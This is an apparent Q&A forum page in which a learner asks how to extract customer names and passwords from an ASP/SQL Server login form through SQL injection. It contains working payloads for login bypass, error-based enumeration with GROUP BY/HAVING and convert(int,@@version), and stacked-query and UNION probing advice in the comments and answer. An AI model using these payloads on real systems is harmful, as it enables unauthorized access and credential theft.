3

I have a simple web application in asp with SQL Server back end database. The login page has an injection point and I am able to bypass the login by the usual ` ' OR 1=1 '. Now I was able to enumerate the columns in the database using GROUP BY and HAVING statements. I was able to enumerate the information in the error thrown at me.

` ' or '1' = '1' GROUP BY tblCustomers.cust_id, tblCustomers.cust_name, tblCustomers.cust_password, tblCustomers.cust_account  
HAVING 1=1 --  `

I am in the learning phase and I found out that the cust_id, cust_name, cust_password, cust_account are the columns and tblCustomers is the table name.

I am also able to use AND statements along with the convert function to enumerate some information. The command I used is ' or '1' = '1' and 1 =convert(int,@@version)--and again I am able to get the information in the errors.

Now, how can I dump the entries in the database to know at least the customer name and password? I tried stack queries separated by semicolon but after executing the first query i.e ' OR 1=1 I just log in and cant see any output as theirs no other parameter, I cannot output it anywhere else on the page( there is no parameters and theirs just a blank page after i login). UNION SELECT is not working as I am not able to guess the first SELECT statement and its exits. Any functions that can help me dump the customer names and password?

I'll really appreciate any help with this. Thanks.

marc_s
  • 732,580
  • 175
  • 1,330
  • 1,459
Tim
  • 41
  • 1
  • 5
  • Make the 1st query disallow login. i.e. instead of "or 1 = 1" write "and 1 < 1", then the next statement. If I understand correctly where can you inject, login will fail and you'll get your dump (hopefully, but depends on the portal you are fiddling with). EDIT: BTW why do you enter correct user/pwd combo if you want the query to fail? + you can kinda figure out the login query, it should be very simple (user name & password, perhaps?) –  Jun 05 '16 at 15:57
  • Thanks Mark. I tried your suggestion. ` and 1<1 ; SELECT * from tblCustomers ` this time the login fails and it takes me back to the login prompt again. Its just a learning web application so there is absolutely nothing more once one is able to login. – Tim Jun 05 '16 at 16:08
  • I add this as an answer then, thanks if you accept ;) –  Jun 05 '16 at 17:31
  • try `union select 1,1,1,1` (and again) to count the number of fields in `select`. Success is not guaranteed because the page may stop reading after 1st row. – Alex Kudryashev Jun 05 '16 at 17:33
  • Hi Alex, The query you suggested gives me an error `Syntax error converting the varchar value 'abraham' to a column of data type int` I am expecting the first column `cust_id` to be of data type int. Also, I'd like to mention that the error page is a tradiational "page not displayed" and contains the information somewhere along with the POST request details – Tim Jun 05 '16 at 22:34

1 Answers1

0

Make the 1st query disallow login. i.e. instead of "or 1 = 1" write "and 1 < 1", then the next statement. If I understand correctly where can you inject, login will fail and you'll get your dump (hopefully, but depends on the portal you are fiddling with). EDIT: BTW why do you enter correct user/pwd combo if you want the query to fail? + you can kinda figure out the login query, it should be very simple (user name & password, perhaps?)